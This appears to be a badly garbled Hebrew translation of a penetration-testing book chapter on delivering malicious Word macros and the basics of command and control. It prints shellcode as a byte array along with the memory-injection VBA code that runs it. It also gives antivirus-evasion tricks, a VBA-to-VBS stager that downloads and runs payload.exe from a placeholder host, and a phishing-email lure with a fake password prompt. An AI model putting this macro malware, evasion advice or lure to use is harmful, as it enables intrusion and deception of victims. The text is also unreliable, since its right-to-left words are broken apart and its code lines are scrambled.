‫תת פתי חה או טומ טית)(‬

‫פתי חה או טומ טית‬
‫)(‪Subbook_Open‬‬
‫או טומ טי_פתי חה‬
‫קוד זה טו ש ט ש מתוך מ ח ש בה ע לידי ה כ לי ) שמות פונ קציות ומ שתנים נוצרו באופן‬

‫א קראי( ו קוד המע טפת עצמו קודד באמצעות מ ספר אי טרציות ש ל א לגוריתם ‪ga-nai.‬‬
‫‪shikata-‬אף ע ל פי כן‪ ,‬ה קוד הזהייד ל ק כמו עץ חג המו לד ברגע שהוא בא במגע עם‬
‫כ ל סוג ש ל זיהוי תו כנות זדוניות או סור ק וירו סים‪ .‬ל שם הדגמה‪ ,‬אנו לו ק חים את ה קוד‬
‫הזה‪ ,‬מיי באים אותו למ סמך וורד‪ ,‬ורואים באיזו ק לות ניתן לזהות אותו )ראה איור ‪1.3).‬‬
‫איור ‪ 1.3:‬קוד ניצו ל ‪ VBA‬מיו בא לתוך ‪MS Word.‬‬

‫שמור את מ סמך ‪Word‬זה כמ סמך המאפ שר מא קרו‪ ,‬כפי שמוצג באיור ‪1.4.‬‬
‫איור ‪ 1.4:‬שמירה להו כ חת אנ טי וירו ס רא שונית‪.‬‬

‫אם נע לה מ סמך זה לאתר סרי קת וירו סים מצ ט בר ‪www.virustotal.com‬אנו‬
‫י כו לים לראות כיצד זה מ חזי ק מעמד בניתו ח ש ל ‪ 54‬מ סדי נתונים נפרדים ש ל תו כנות‬
‫זדוניות‪ ,‬כפי שמוצג באיור ‪1.5.‬‬
‫איור ‪1.5:‬זה מדגים שיעור פגיעה ‪ -AV‬ב ג בוה באופן ב לתי מ קו ב ל‪ 48 .‬כני סות מתוך‬
‫‪ 54‬מנועי ?‪ AV‬לא כמע ט מ ספי ק טו ב‪.‬‬
‫‪ VirusTotal‬מ ספ ק גם מידע היורי ס טי שרומז כיצד א לה‬
‫תוצאות מופ קות‪ ,‬כפי שמוצג באיור ‪1.6.‬‬
‫איור ‪ 1.6:‬מידע נו סף‪.‬‬

‫ב ק טע התגים‪ ,‬אנו רואים את הע בריינים הגדו לים ביותר ש לנו‪ :‬פתי חה או טומ טית‬
‫וה חדרת קוד‪ .‬בואו נפריד את קוד ה‪ ABV-‬ח ל ק א חר סעיף ונראה מה אנ חנוי כו לים‬
‫לע שות כדי לצמצם את ט ביעת הרג ל לזיהוי ש לנו‪ .‬אם אנ חנויודעים מרא ש איזה פתרון‬
‫‪ AV‬פוע ל המ טרה‪ ,‬אז הר בהיותר טו ב‪ ,‬א ב ל המ טרה ש ל כם צרי כה להיות לא פ חות‬
‫מ קצ ב זיהוי ש ל אפ ס‪.‬‬
‫ב חינת קוד ‪VBA‬‬

‫ב סעיף הצהרת הפונ קציות‪ ,‬אנוי כו לים לראות ש לו ש פונ קציות מיו באות מ‪-‬‬
‫‪ kernel32.dll.‬מ טרת הפונ קציות ה ל לו היא ליצור שר שור תה ליך‪ ,‬לה קצות זי כרון ל קוד‬
‫המע טפת ו להזיז את קוד המע טפת למר ח ב הזי כרון הזה‪ .‬באופן מציאותי‪ ,‬אין צורך‬
‫לגי טימי שהפונ קציונ ליות הזו תהיה זמינה ב קוד מא קרו שפוע ל בתוך מע בד תמ לי לים‬
‫או גי ליון א ל ק טרוני‪ .‬כ כא לה )ו בהת ח ש ב בצורך ש להם בעת פרי סת קוד ‪shell),‬הנו כ חות‬
‫ש להם ת ספי ק לעתים קרו בות כדי להפעי ל זיהוי תו כנות זדוניות‪.‬‬
‫‪ Private Declare PtrSafe‬פונ קציה ‪CreateThread Lib "kernel32" (ByVal‬‬

‫‪Zdz As Long, ByVal Tfnsv As Long, ByVal Kyfde As LongPtr, Spjyjr As‬‬
‫‪Long, ByVal Pcxhytlle As Long, Coupxdxe As Long) As LongPtr‬‬
‫‪ Private Declare PtrSafe‬פונ קציה ‪VirtualAlloc Lib "kernel32" (ByVal‬‬
Hflhigyw As Long, ByVal Zeruom As Long, ByVal Rlzbwy As Long, ByVal

Dcdtyekv As Long) As LongPtr
RtlMoveMemory Lib "kernel32" ‫ פונ קציה‬Private Declare PtrSafe
(ByVal Kojhgx As LongPtr, ByRef Und As Any, ByVal Issacgbu As Long)
LongPtr ‫בתור‬
‫ א לא ר ק את‬,‫ שים ל ב שהר בה סור קי וירו סים לאי סרו ק את סעיף ההצהרה‬,‫עם זאת‬
:‫ כמו‬,‫ למ ש ל‬,‫ מה שאומר שאתהי כו ל כ כינוייי בוא פונ קציה‬,‫גוף ה קוד הרא שי‬
‫ כינוי‬CreateThread Lib "kernel32" ‫ פונ קציה‬Private Declare PtrSafe

"CTAlias" (ByVal Zdz As Long, ByVal Tfnsv As Long, ByVal Kyfde As
LongPtr, Spjyjr As Long, ByVal Pcxhytlle As Long, Coupxdxe As Long)
LongPtr ‫בתור‬
AV, ‫ זה למע שה מ ספי ק כדי לע קוף מ ספר פתרונות‬.‫ו קראו ר ק ל כינוי עצמו בגוף ה קוד‬
.‫כו ל ל הגנת נ קודות ה קצה ש ל מי קרו סופ ט‬
‫ ב‬-Shellcode ‫הימנע מ שימו ש‬

.‫ אך ניתן לזהות אותו ב ק לות‬,‫בימוי המת קפה כ קוד מע טפת הוא נו ח‬
Wizksxyu =
Array(232,137,0,0,0,96,137,229,49,210,100,139,82,48,139,82,12,139,82,20,
139,114,40,15,183,74,38,49,255,49,192,172,60,97,124,2,44,32,193,207,
13,1,199,226,240,82,87,139,82,16,139,66,60,1,208,139,64,120,133,192,
116,74,1,208,80,139,72,24,139,88,32,1,211,227,60,73,139,52,139,1,
214,49,255,49,192,172,193,207,13,1,199,56,224,117,244,3,125,248,59,125,
36,117,226,88,139,88,36,1,211,102,139,12,75,139,88,28,1,211,139,4,
139,1,208,137,68,36,36,91,91,97,89,90,81,255,224,88,95,90,139,18,
235,134,93,104,110,101,116,0,104,119,105,110,105,137,230,84,104,76,119,38,
7,255,213,49,255,87,87,87,87,86,104,58,86,121,167,255,213,235,96,91,
‫‪49,201,81,81,106,3,81,81,106,80,83,80,104,87,137,159,198,255,213,235,‬‬
‫‪79,89,49,210,82,104,0,50,96,132,82,82,82,81,82,80,104,235,85,46,‬‬
‫‪59,255,213,137,198,106,16,91,104,128,51,0,0,137,224,106,4,80,106,31,‬‬
‫‪86,104,117,70,158,134,255,213,49,255,87,87,87,87,86,104,45,6,24,123,‬‬
‫‪255,213,133,192,117,20,75,15,132,113,0,0,0,235,209,233,131,0,0,0,‬‬
‫‪232,172,255,255,255,0,235,107,49,192,95,80,106,2,106,2,80,106,2,106,‬‬
‫‪2,87,104,218,246,218,79,255,213,147,49,192,102,184,4,3,41,196,84,141,‬‬
‫‪76,36,8,49,192,180,3,80,81,86,104,18,150,137,226,255,213,133,192,116,‬‬
‫‪45,88,133,192,116,22,106,0,84,80,141,68,36,12,80,83,104,45,87,174,‬‬
‫‪91,255,213,131,236,4,235,206,83,104,198,150,135,82,255,213,106,0,87,104,‬‬
‫‪49,139,111,135,255,213,106,0,104,240,181,162,86,255,213,232,144,255,255,255,‬‬
‫‪99,58,100,97,118,101,46,101,120,101,0,232,19,255,255,255,119,119,119,46,‬‬
‫_‬
‫)‪98,111,98,46,99,111,109,0‬‬
‫אנ חנוי כו לים ל קודד את זה במ ספר דר כים באמצעות מ ספר אי טרציות כדי לה ב טי ח‬
‫שזה לא מפעי ל חתימת ‪ AV‬וזה נהדר; זה עו בד ב סדר‪ .‬ה בעיה היא שזה לא מ שנה את‬
‫העו בדה שזה עדיין ל לא ספ ק ‪ shellcode.‬מערך ש ל בתים ) למרות שהוא מ קודד כאן‬
‫כע שרוני ו לא ה ק סדצימ לי המו כריותר( עומד להיראות ח שוד בעיני ‪ AV‬ו ס ביר להני ח‬
‫שהואיפעי ל אזהרת קוד מע טפת גנרית‪ .‬בנו סף‪ ,‬תו כנת אנ טי‪-‬וירו ס מודרנית מ סוג לת‬
‫להע ביר קוד קומפי לציה ) כו ל ל קוד מע טפת( למ כונה מי קרו‪-‬ויר טוא לית כדי ל בדו ק‬
‫בצורה היורי ס טית‪ .‬אז זה לא מ שנה איך הוא מ קודד ‪-AV‬ה ‪-‬יו כ ל לראות מה הוא עו שה‪.‬‬
‫זה הגיוני ע בור ‪ msfvenom‬ל ס כם את ההת קפות ש לה כך‪ ,‬כי אז היאי כו לה לפרו ס את‬
‫כ ל המ טענים הר בים ש לה ב ס קריפ ט ‪VBA‬א חד‪ ,‬א ב ל ע בור מעור בות רצינית ש ל ‪APT‬‬
‫זה לא כמע ט מ ספי ק סמוי‪ֶ ׁ .‬ש לָ ה‬
‫אפ שר ל קודד את המערך הזה במ ספר דר כים ) למ ש ל כמ חרוזת )‪ Base64‬ו לא חר מ כן ל בנות אותו מ חד ש‬
‫בזמן ריצה‪ ,‬א ב ל זה לא מפ חית את ספירת ‪-AV‬ה מ ספי ק כדי להיות שווה את המאמץ‪.‬‬
‫גו ש ה קוד ה בא מ כי ל את קריאות הפונ קציה עצמן‪:‬‬
‫)‪Qgsztm = VirtualAlloc(0, UBound(Wizksxyu), &H1000, &H40‬‬

‫ע בור )‪Rxnffhltx = LBound(Wizksxyu) To UBound(Wizksxyu‬‬
‫)‪Hdhskh = Wizksxyu(Rxnffhltx‬‬
‫‪Svfb = RtlMoveMemory(Qgsztm + Rxnffhltx, Hdhskh,‬‬
‫ה בא ‪Rxnffhltx‬‬
‫)‪Svfb = CreateThread(0, 0, Qgsztm, 0, 0, 0‬‬
‫אין הר בה מה להו סיף כאן פר ט ל כך שהפונ קציות ‪ VirtualAlloc, RtlMoveMemory‬ו‪CreateThread -‬‬

‫ח שודות מ ט בען והו ל כות להפעי ל ‪ AV‬לא מ שנה כמה תמימות שאר ה קוד ש לך‪ .‬פונ קציות א לוי סומנו גם אם‬
‫לא קיים מ טען קוד מע טפת‪.‬‬
‫ביצוע קוד או טומ טי‬

‫הנ קודה הא חרונה שאני רוצה להעיר נוגעת ל שימו ש ה בו טה מדי בפונ קציונ ליות הפתי חה האו טומ טית ‪ .‬פונ קציה‬
‫זו מ ב טי חה שהמא קרו ש לךיפע ל ברגע שהמ שתמ שי ס כים להפעי ל תו כן‪.‬י שנן ש לו ש דר כים שונות לע שות זאת‪,‬‬
‫ת לוי אם המא קרו ש לך פוע ל במ סמך ‪Word,‬גי ליון א ל ק טרוני ש ל ‪Excel‬או חו ברת ע בודה ש ל ‪Excel.‬ה קוד‬
‫קורא ל ש לו שתם כדי לה ב טי ח ש כ ליי שום שתד בי ק אותו בו‪ ,‬ה קודיופע ל‪ .‬שו ב‪ ,‬אין צורך לגי טימי לע שות זאת‪.‬‬
‫כמפת ח מא קרו‪ ,‬ע ליך לדעת לאיזו ס בי בה אתה מ קודד‪.‬‬
‫תת שגרת ברירת המ חד ל נ קראת ע לידי ‪ Word‬ומ כי לה את המ טען ש לנו‪:‬‬
‫‪Sub Auto_Open‬‬
‫גו ש קוד רא שי‬
‫שתי הפונ קציות הא חרות נ קראות ע לידי ‪ Excel‬ופ שו ט מצ ביעות חזרה ע ל הפונ קציה ‪ Auto_Open‬ש ל‬
‫‪Word .‬‬
‫תת פתי חה או טומ טית)(‬

‫ו‬
‫)(‪Subbook_Open‬‬
‫שימו ש בתת שגרת פתי חה או טומ טית א חת הוא ח שוד‪ ,‬שימו ש ב ש לו שתןי סומן כמע ט‬
‫בוודאות‪ .‬ר ק ע לידי ה סרת שתי ה קריאות הא חרונות למ סמך ‪Word,‬נו כ ל להפ חית‬
‫מיד את שיעור הפגיעה ‪ -AV‬ב ש לנו‪ .‬ה סרת ש לו שתם מפ חיתה את ה ספירה הזו עוד‬
‫יותר‪.‬‬
‫י שנן פונ קציות מ קוריות בתוך ‪VBA‬המאפ שרות לתו קף להוריד ו להפעי ל קוד מהאינ טרנ ט‬
‫) הפונ קציות ‪ Shell‬ו‪ URLDownLoadToFile , -‬למ ש ל(; עם זאת‪ ,‬א לה כפופים לאותן‬
‫בעיות שראינו כאן ‪-‬הן ח שודות והן עומדות להיות מ סומנות‪.‬‬
‫ה שורה הת חתונה היא שזיהוי אנ טי‪-‬וירו ס‪/‬תו כנות זדוניות הוא מאוד לא ס ל חן לפ קודות‬
‫מא קרו ש ל ‪ MS Office‬בהת ח ש ב בהי ס טוריה הארו כה ש להן ש ל שימו ש להע ברת‬
‫מ טענים‪ .‬ל כן אנ חנו צרי כים להיות קצתיותריצירתיים‪ .‬מה אם הייתה דרך לפרו ס‬
‫הת קפה לדי ס ק ו ל בצע אותה ל לא שימו ש ב‪ shellcode -‬ו ל לא צורך ב‪ ABV-‬להוריד‬
‫ו להפעי ל את ה קוד עצמו באופן א ק טי בי?‬
‫שימו ש ב‪VBS Dual Stager/ABV-‬‬

‫אנ חנוי כו לים לפתור את ה בעיה הזו ע לידי פירו ק ה ס טייג'ר ש לנו ל שני ח ל קים‪ .‬הזן את ‪-‬‬
‫‪ Windows Scripting Host‬גם תת‪ -‬ק בוצה ש ל שפת ‪ Visual Basic.‬כא שר נע שה‬
‫שימו ש ב‪ ABV-‬ר ק בתוך מ סמ כי ‪Office, VBS‬היא שפת ס קריפ טים עצמאית המ ק בי לה‬
‫לפייתון או רו בי‪ .‬הוא תו כנן וא כן נדר ש ל בצע מ שימות מור כ בות הר בהיותר מא שר‬
‫או טומציה ש ל פונ קציונ ליות בתוך מ סמ כי ‪ MS Office.‬ל כן הוא מ ק ב ל קו רו ח ב הר בה‬
‫יותר גדו ל ע לידי ‪ AV.‬בדומה ל‪VBS ,ABV-‬היא שפה לא הידור מפור שת וניתן ל קרוא‬
‫ל קוד מ קו בץ ט ק ס ט פ שו ט‪ .‬ל כן זו מת קפה בת קיימא לפרו ס מא קרו ‪VBA‬תמים למראה‬
‫שיי שא מ טען ‪VBS,‬י כתו ב אותו ל קו בץ וי בצע אותו‪ .‬לא חר מ כן‪ ,‬ההרמה ה כ בדה תת בצע‬
‫ע לידי קוד ‪VBS.‬אמנם זהידרו ש גם שימו ש בפונ קציית ‪ Shell‬ב‪ ,ABV-‬אך אנו נ שתמ ש‬
‫בה לא כדי להפעי ל קוד לאידוע או ח שוד‪ ,‬א לא ע בור ‪Windows Scripting Host‬‬
‫במ קום זאת‪ ,‬שהוא ח ל ק ב לתי נפרד ממער כת ההפע לה‪ .‬אז בעצם‪ ,‬אנ חנו צרי כים שני‬
‫ס קריפ טים ‪-‬א חד ‪ VBA‬וא חד ‪ VBS -‬ו שניהםיצ טר כו להיות מ סוג לים לע בור דרך ‪AV‬‬
‫ל לא זיהוי‪ .‬תת שגרת המא קרו ש ל ‪ VBA‬כדי לע שות זאת צרי כה להיראות בערך כמו‬
‫ה בא‪:‬‬
‫)(‪Sub WritePayload‬‬
‫"‪As String FilePath = "C:\temp\payload.vbs‬‬
‫‪Dim PayLoadFile As Integer Dim FilePath‬‬
‫‪PayloadFile = FreeFile‬‬
#PayLoadFile, ‫ ע בור פ ל ט כ קו בץ ט ק ס ט הדפ ס‬FilePath ‫פת ח את‬

VBS 1" ‫" שורת ס קריפ ט‬
#PayLoadFile,
VBS Script Line
" ‫הדפ ס‬
2"
#PayLoadFile,
VBS Script Line
" ‫הדפ ס‬
3"
#PayLoadFile,
VBS Script Line
" ‫הדפ ס‬
4"
‫ה‬-PayloadFile "wscript c:\temp\payload.vbs" ‫סגור את מע טפת‬
‫שמור ע ל קוד כ ל לי ב כ ל פעם שאפ שר‬

.‫ ה שימו ש במי לה "מ טען" כאן הוא המ ח שה ואין ל ח קות אותו‬,‫ אג ב‬.‫ד ברים די פ שו טים‬
‫היתרון ש ל שמירה ע ל ה קוד גנרי כ כ ל האפ שר אומר גם שהואידרו ש מע ט מאוד שינויים‬
Microsoft Windows. ‫ ו לא‬Apple OSX ‫אם תו קפים פ ל טפורמת‬
‫ ה כנ ס את ה ס קריפ ט ה בא להצהרות ההדפ סה וי ש לך הת קפת‬,‫ה עצמו‬-VBS ‫לג בי‬

:‫ שו ב זה נוצר למ טרות המ ח שה וי שנן דר כים ר בות לע שות זאת כמו שי ש קודנים‬- ‫ע בודה‬
HTTPDownload "http://www.wherever.com/files/payload.exe", "C:\temp"

Sub HTTPDownload ( myURL, myPath )
objHTTP, strFile, strMsg Const ForReading = 1, ForWriting = 2, ForAppending = 8
objFSO = CreateObject( "Scripting.FileSystemObject" ) ‫הגדר‬Dim i, objFile, objFSO,
= objFSO.BuildPath( myPath, Mid( myURL, ‫אז‬objFSO.FolderExists( myPath ) ‫אם‬

strFile
InStrRev( myURL, "/") + 1 ) )
ElseIf objFSO.FolderExists( Left( myPath, InStrRev( myPath,
strFile = myPath ‫ ואז‬- 1"\")
))
‫סוף אם‬
objFile = objFSO.OpenTextFile( strFile, ForWriting, ‫הגדר‬
(‫נ כון‬
LenB( objHTTP.ResponseBody ) objFile.Write Chr( objHTTP( MidBHTRe,(sBHTTPRe) ‫הגדר‬
objHTTP.Open "GET", myURL, False objHTTP.Send For i = 1 To
,‫אני‬objHTTP = CreateObject( "WinHttp.WinHttpRequest.5.1" )
1)))
‫הַ ָ ּבא‬
objFile.Close( )
WshShell = WScript.CreateObject("WScript.Shell") ‫הגדר‬
WshShell.Run "c:\temp\payload.exe"
‫ עומד ל ק בוע את כוונתו‬ABV-‫ כ ל מי ש בו חן את קוד ה‬,‫כמו בן‬

‫די מהר‪ ,‬אז אני מציע צורה כ ל שהי ש ל ערפו ל להת קפה בעו לם האמיתי‪.‬‬
‫שים ל ב גם שרמת מור כ בות זו מיותרת ל ח לו טין כדי להוריד ו להפעי ל קו בץ הפע לה‪.‬‬
‫אפ שריהיה לה שתמ ש בפ קודה ‪ shell‬כדי ל קרוא ל כ לים שונים שנ ש ל חו עם ‪Windows‬‬
‫כדי לע שות זאת בפ קודה א חת ) למע שה‪ ,‬אני אע שה זאת בהמ שך פר ק ‪ 6 ,‬ב סעיף‬
‫ש כותרתו ‪"VBA Redux"),‬א ב ל רציתי תירוץ להציג את הרעיון ש ל שימו ש ב‪ ABV-‬כדי‬
‫להוריד ס קריפ ט ‪VBS.‬‬
‫ערפו ל קוד‬
‫י שנן מ ספר דר כים ל ט ש ט ש קוד‪ .‬למ טרות התרגי ל הזה‪ ,‬נו כ ל ל קודד את ה שורות ש ל‬
‫המ טען כ‪ 46esaB-‬ו לפענ ח אותן לפני כתי בתן ל קו בץ היעד; זה פרימי טי בי א ב ל שו ב‬
‫ממ חי ש‪ .‬ב כ ל מ קרה‪ ,‬אם מתג לה מת קפת מא קרו ע לידי גורם אנו שי ו לא ע לידי ‪AV‬‬
‫ונערך תרגי ל מ שפ טי רציני ומו כ שר כדי ל ק בוע את מ טרת ה קוד‪ ,‬אזי אין כמות ש ל ערפו ל‬
‫אםיגן ע ל כוונות ה קוד‪.‬‬
‫ניתן ל ט ש ט ש קוד זה עודיותר ) לדוגמה עם פונ קציית ;) ‪XOR‬זה באמת ת לוי בך כמה‬
‫מור כ ב אתה רוצה להפוך את ה קוד ש לך‪ ,‬למרות שאני לא ממ ליץ ע ל פתרונות מ ס חריים‬
‫הדור שים שי לו ב ספריות ש ל צד ש לי שי במ סמך‪ ,‬ש כן שו ב א להי סומנו ע לידי ‪AV.‬‬
‫בואו נ ש ל ב את מ טען ה ש ל ב ה שני ש לנו במא קרו ‪ VBA‬ש ל ב ‪ 1‬ש לנו ונראה איך הוא עומד‬
‫מו ל ‪ AV.‬שו ב‪ ,‬אנו מ שתמ שים ‪ -VirusTotal.‬ב ראה איור ‪1.7.‬‬
‫איור ‪1.7:‬א כן מ טען חמ קני‪.‬‬

‫יותר טו ב‪ ,‬א ב ל מה לג בי מ טען ‪ VBS‬עצמו ברגע שהוא נוגע בדי ס ק? ראה איור ‪1.8.‬‬
‫איור ‪ 1.8:‬לא‪Qihoo-360 ,‬אינו הג ביע ה קדו ש ש ל ‪AV.‬‬

‫או ‪-‬או‪.‬י ש לנו להי ט ש ל ‪ Qihoo-360.‬מדו בר ב סור ק וירו סים סיני ש טוען שי ש לו קרו ב‬
‫ל חצי מי ליארד מ שתמ שים‪ .‬לא‪ ,‬גם אני אף פעם לא שמעתי ע ל זה‪ .‬הוא מ סמן את ה קוד‬
‫כ‪ virus.vbs.gen.33, -‬וזו דרך נו ספת לומר שאם זה קו בץ ‪VBS‬הואיו כרז כעוין ע לידי‬
‫המוצר הזה‪ .‬זו ע שויה להיות בעיה במ קרה מאוד לא ס ביר שתת ק לו אי פעם‬
‫‪ -Qihoo-360.‬ב‬
‫עד כה‪ ,‬לא כ ל לנו שום מנגנון ל ביצוע ה קוד בפוע ל כא שר המ סמך ש לנו נפת ח ע לידי‬
‫המ שתמ ש‪.‬‬
‫מפתה מ שתמ שים‬

‫אני לא אוה ב לה שתמ ש בפונ קציות הפתי חה האו טומ טית מ סי בות שנדונו קודם ל כן‪,‬‬
‫והדעה ש לי היא שאם מ שתמ ש כ בר מו ש קע מ ספי ק כדי לאפ שר פ קודות מא קרו לפעו ל‬
‫מ ל כת חי לה‪ ,‬אז זה לא קפיצת דמיון ענ קית להני ח שהםיצ לי חו להיות מו כן ל קיים‬
‫אינ טרא קציה עם המ סמך בדרך נו ספת‪ .‬כדוגמה‪ ,‬כ שהת קיפה ש לנו במצ בה הנו כ חי‪,‬‬
‫היא תופיע כפי שמוצג באיור ‪ 1.9‬למ שתמ ש כא שר היא נפת חת ‪ -Microsoft Word.‬ב‬
‫איור ‪ 1.9:‬מ סמך רי ק הנו שא מ טען מא קרו‪.‬‬

‫לא מאוד מפתה נ כון? מ סמך רי ק המ ב ק ש ממך ל ל חוץ ע ל כפתור עם המי לים "אזהרת‬
‫א ב ט חה" לידו‪ .‬כ ל מא קרו‪ ,‬בין אם הוא חתום ב קוד ו בין אם לא‪,‬י כי ל את אותה הודעה‬
‫בדיו ק‪ .‬מ שתמ שים נהיו קצת עייפים ל חומרה הפו טנציא לית ש ל ל חיצה ע ל כפתור זה‪,‬‬
‫אז נותרו לנו שתי בעיות לפתור ‪-‬איך לגרום למ שתמ ש להפעי ל את ה קוד ש לנו ואיך‬
‫להפוך את המ סמך מ ספי ק מפתה לאינ טרא קציה‪ .‬הרא שון הוא ט כני; ה שנייה היא‬
‫שא לה ש ל הנד סה ח ברתית‪ .‬זה הא חרון ב שי לו ב עם תירוץ דוא" ל מ ש כנע )או מ ש לו ח‬
‫א חר(י כו ל להיות מת קפהיעי לה ביותר אפי לו נגד המ טרות המודעות ביותר לא ב ט חה‪.‬‬
‫י ש כמה ספרים טו בים ע ל הנד סה ח ברתית ב חוץ‪ .‬בדו ק את אמנות הה טעיה ש ל קווין‬
‫מי טני ק )‪(Wiley, 2002‬או את ההנד סה ה ח ברתית ש ל כרי ס האדג'י‪(Wiley, 2010). :‬‬
‫‪The Art of Human Hacking‬‬
‫בואו נת חי ל ביצירת העי לה הזו‪.‬‬
‫א חד האמצעים היעי לים במיו חד לגרום למ טרה לפתו ח מ סמך ו לאפ שר פ קודות מא קרו‬
‫‪ -‬גם כ שהמו ח הא חורי ש להן צוע ק להפ סי ק ‪-‬הוא לרמוז שמידע נ ש ל ח א ליהם ב טעות;‬
‫זה מ שהו שהם לא צרי כים לראות‪ .‬מ שהו שייתן להםיתרון בדרך כ ל שהי או מ שהו‬
‫שיעמיד אותם בנ חיתות אםיתע למו ממנו‪.‬‬
‫עם ה ש למה או טומ טית ש ל כתו בת ב ל קו חות דוא" ל‪ ,‬כו לנו ש ל חנו אימיי ל ב חיפזון לאדם‬
‫ה לא נ כון ו כו לנו קי ב לנו מ שהו ש לא נועד ע בורנו‪ .‬זה קורה כ ל הזמן‪ .‬ש קו ל את המיי ל‬
‫ה בא ש"היה צריך להי ש ל ח" לג'ונתן קריימר ב‪ RH-‬אך ב טעות מצא את דר כו לד"ר‬
‫ג'ונתן קריין‪:‬‬
‫א ל‪ :‬ד"ר ג'ונתן קריין מאת‪ :‬ד"ר האר לין‬
‫קווינז ל‬
‫נו שא‪ :‬סודי‪ :‬פי טורים ב סי בו ב שני‬
‫ג'ון‪,‬‬
‫מצורפת ר שימת ההצעות העד כנית לפי טורים בצוות ש לי במ ח ל קת טיפו ל נמרץ‪ .‬אני לא שמ ח לא בד אף‬
‫א חד מ ח ברי הצוות בהת ח ש ב בעומ ס הע בודה הנו כ חי ש לנו‪ ,‬א ב ל לפ חות ע כ שיוי ש לנו קו ב סי ס לדיון ‪-‬אני‬
‫אהיה ב קמפו ס ביום שי שי אז אנא חזור א לי עד אז‪.‬‬
‫ב בר כה‪,‬‬
‫האר לי‬
‫נ‪ .‬ב‪ .‬המ סמך מאו ב ט ח בהתאם להנ חיות בית ה חו לים‪ .‬כא שר אתה מת ב ק ש להזין את זה ה סי סמה היא‬
‫'אר קהם'‪.‬‬
‫זו באמת לה מרו שעת במיו חד‪ .‬ד"ר קריין ע כ שיו בוודאי תוהה אם הוא נמצא בר שימה‬
‫ש ל פי טורים‪.‬‬
‫לאימיי ל זה מצורף המ סמך נו שא המא קרו ש לנו‪ ,‬כפי שמוצג באיור ‪1.10.‬‬
‫איור ‪ 1.10:‬קצתיותר מ ש כנע‪.‬‬

‫כעת אנו רוצים להו סיף תי בת ט ק ס ט ו כפתור למ סמך שיופיעו כא שר היעדיאפ שר פ קודות‬
‫מא קרו‪ .‬אנ חנו רוצים ל ק שור את קוד ‪-VBS dropper‬ה ש לנו ל כפתור כך שהואית בצע‬
‫ב ל חיצה‪ ,‬ל לא ק שר למה שהמ שתמ ש מ ק ליד בתי בת ה ט ק ס ט‪ .‬לא חר מ כן תופיע תי בת‬
‫הודעה המודיעה למ טרה שה סי סמה שגויה‪ ,‬שו ב ל לא ק שר למה שהוזן‪.‬‬
‫יתרון נו סף בגי שה ש ל מת קפה זו הוא ש) בהנ חה שאין אינדי ק טורים נו ספים כגון התראות‬
‫)‪ AV‬לא ס ביר שהמ טרה תעורר את האזע קה לא ל שו ל ח ו לא ‪ -IT,‬ל מ כיוון שהם לא היו‬
‫אמורים לראות את המ סמך הזה מ ל כת חי לה‪ ,‬האם הם היו?‬
‫כדי לה קצות פ קודה או מא קרו ל ל חצן ו לה כני ס ל חצן זה ל ט ק ס ט ש לך‪ ,‬מ קם את נ קודת‬
‫הה כנ סה במ קום ש בו ברצונך שה ל חצןיופיע ו לא חר מ כן בצע את ה ש ל בים ה באים‪:‬‬
‫‪1.‬ה ק ש ‪ Ctrl+F9‬כדי להו סיף שדה‪.‬‬
‫‪ 2.‬בין סוגריים ש ל ה שדה‪ ,‬ה ק לד ‪ MacroButton,‬ו לא חר מ כן את שם הפ קודה או‬

‫המא קרו ש ברצונך שה כפתורי בצע‪.‬‬
‫‪3.‬ה ק לד את ה ט ק ס ט ש ברצונך להציג‪ ,‬או הו סף גרפי קה שת שמ ש כ ל חצן‪.‬‬
‫‪4.‬ה ק ש ‪ F9‬כדי לעד כן את תצוגת ה שדה‪.‬‬
‫ב סוף תת ‪-‬ה שגרה )(‪ WritePayload‬כדאי ל ש קו ל להו סיף את ה שורה ה באה‪:‬‬
‫‪ "MsgBox‬סי סמה שגויה‪ .‬א ב ט חת ‪IT‬ת ק ב ל הודעה בע ק בות הפרות נו ספות ע לידי "‬
‫&‬
‫‪ ")(Environ$‬שם מ שתמ ש"((‬
‫פעו לה זו תיצור תי בת הודעה קופצת המת חזה להתראת א ב ט חה ה כו ל לת את שם‬

‫המ שתמ ש ש ל המ שתמ ש המ חו בר כעת‪ .‬גי שה מותאמת אי שית זו היא שעו שה את‬
‫הה בד ל בין הצ ל חה ל כי ש לון בעת א ספ קת המ טען הרא שוני ש לך‪.‬‬
‫פי קוד ו ב קרה ח ל ק ‪1:‬י סודות ו‬

‫י סודות‬
‫לא חר ש ק בענו את האמצעים ש באמצעותם אנו מת כוונים ל ספ ק את המ טען ש לנו‪,‬‬
‫הגיע הזמן ל ח שו ב ברצינות מה צריך להיות המ טען הזה‪ .‬ב ח ל ק זה‪ ,‬נ ב חן את עי קרי‬
‫העצמות ה ח שופות ש ל מה שדרו ש בת שתית פי קוד ו ב קרה ‪ (C2).‬ב כ ל פר ק נ ב קר‬
‫מ חד ש‪ ,‬נ חדד ונו סיף פונ קציונ ליות ע ל מנת להמ חי ש את הא למנ טים הדרו שים או‬
‫הרצויים המר כי בים את ה לי בה ש ל ט כנו לוגיית ‪APT‬ארו כת ה טוו ח לא חר שהתר ח שה‬
‫חדירה רא שונית ש ל היעד‪ .‬עם זאת‪ ,‬בפר ק זה‪ ,‬אנו מ כ סים את הי סודות‪ ,‬אז בואו נגדיר‬
‫את המינימום ש ל מה שמער כת כזו צרי כה להיות מ סוג לת לא חר פרי סה‪:‬‬
‫קי שוריותיציאה ‪-‬הי כו לת ליזום חי בורים חזרה א ל שרת ‪ C2‬ש לנו דרך האינ טרנ ט‬
‫בצורה כזו שממזערת את האפ שרות ש ל הפרעות חומת א ש‪.‬‬
‫התגנ בות ‪-‬הימנעות מזיהוי הן ע לידי מאר ח והן ע לידי מער כות זיהוי חדירות‬
‫מ בו ס סות ר שת ‪(IDS).‬‬
‫גי שה מר חו ק למער כת ק בצים —י כו לת להעתי ק ק בצים א ל וממנו המ כ שיר‬
‫שנפרץ‪.‬‬
‫ביצוע פ קודה מר חו ק ‪-‬י כו לת ל בצע קוד או פ קודות במ ח ש ב שנפרץ‪.‬‬
‫ת ק שורת מאו ב ט חת ‪ -‬כ ל התע בורה בין המאר ח שנפרץ ל שרת ‪C2‬צרי כה להיות‬
‫מוצפנת ב ס טנדר ט תע שייתי ג בוה‪.‬‬
‫התמדה ‪-‬המ טען צריך ל שרוד את חו לים מ חד ש‪.‬‬
‫הע ברת פור טים ‪-‬נרצה להיות מ סוג לים להפנות תנועה דו‪ -‬כיוונית דרך המאר ח‬
‫שנפרץ‪.‬‬
‫חו ט ב קרה ‪-‬ה ב ט חת חי בורים מ חד ש ל שרת ‪ C2‬במ קרה ש ל הפ ס קת ר שת או‬
